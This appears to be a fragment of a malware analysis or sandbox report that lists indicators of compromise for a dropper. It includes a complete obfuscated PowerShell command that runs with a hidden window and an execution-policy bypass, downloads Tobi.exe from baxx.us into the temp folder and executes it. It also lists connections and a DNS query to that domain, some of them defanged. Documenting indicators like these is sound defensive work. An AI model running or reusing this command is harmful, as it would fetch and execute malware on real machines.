Technical information
- http://baxx.us/tobi.exe as %temp%\\batch.exe
- '<SYSTEM32>\cmd.exe' /c pOWERShell.exe -wIndOWstylE hidDEN -nopRofilE -exeCutIONpOlICy bYpASS (NeW-OBjeCt SystEM.NeT.WEbCliENt).DOWnlOadFilE('http://baxx.us/Tobi.exe','%TEMP%\\Batch.exe') & %TEMP%\\Batch.exe
- 'ba#x.us':80
- 'ba#x.us':443
- http://ba#x.us/Tobi.exe
- 'ba#x.us':443
- DNS ASK ba#x.us